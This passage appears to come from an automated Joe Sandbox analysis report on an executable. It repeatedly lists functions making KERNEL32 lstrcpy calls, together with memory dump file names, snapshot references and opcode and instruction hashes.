                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: cc7e492de9fe9306170a2e67f015658eb9c87a91b1757f896cb828f4855cc8cd
                            • Instruction ID: 2264559627f4a98ae0df88b4d9fb30be4455b4e805c78f9f307dd78687737e01
                            • Opcode Fuzzy Hash: cc7e492de9fe9306170a2e67f015658eb9c87a91b1757f896cb828f4855cc8cd
                            • Instruction Fuzzy Hash: 3F81B1B1E0120A9BDB14CF98DC64BBEB7B6AF84304F14806DE608A7381EB759D45CF94
                            Function 006F1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006F15A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F15D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1611
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1649
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 2ebecec4e9d69245e20289202d2117444c703d708e8b339710ff92032ec63989
                            • Instruction ID: 3cdc3e6396af4c0736d25311c7862195280cbef4e36525e4ae6be2ac01ee3d9d
                            • Opcode Fuzzy Hash: 2ebecec4e9d69245e20289202d2117444c703d708e8b339710ff92032ec63989
                            • Instruction Fuzzy Hash: C62108B4611B078FD774DF2AD468A27B7F6BF55740B04491DA49ACBB41DB30E801CBA0
                            Function 006D1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000), ref: 006D162D
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D164F
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D1671
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D1693
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 7ee73f7553ea17d602eb705634f1f2ab80d0d272e28c3133e3201c19bac57e6e
                            • Instruction ID: 76c97febe3d203b0e9c624017f4390f026c62c08ee3659131538742e1b07b088
                            • Opcode Fuzzy Hash: 7ee73f7553ea17d602eb705634f1f2ab80d0d272e28c3133e3201c19bac57e6e
                            • Instruction Fuzzy Hash: A331D6B4E11B42AFD764DF3AD598952BBE6BF49300700492EA896C7B10EB74F811CB90
                            Function 006D1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006D162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1671
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1693
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 8505bb050cb47f5f432a2586269a630af07ac9f2d14dbae009444733ecff56c1
                            • Instruction ID: a544b0dbce61ad4c2d4bdc204c988604eb5100bb98459437818ba5754a28e6ac
                            • Opcode Fuzzy Hash: 8505bb050cb47f5f432a2586269a630af07ac9f2d14dbae009444733ecff56c1
                            • Instruction Fuzzy Hash: 02115E74E11B43AFDB249F36D428926B7F9BF45701708452EA48ACBB50EB70E801CB90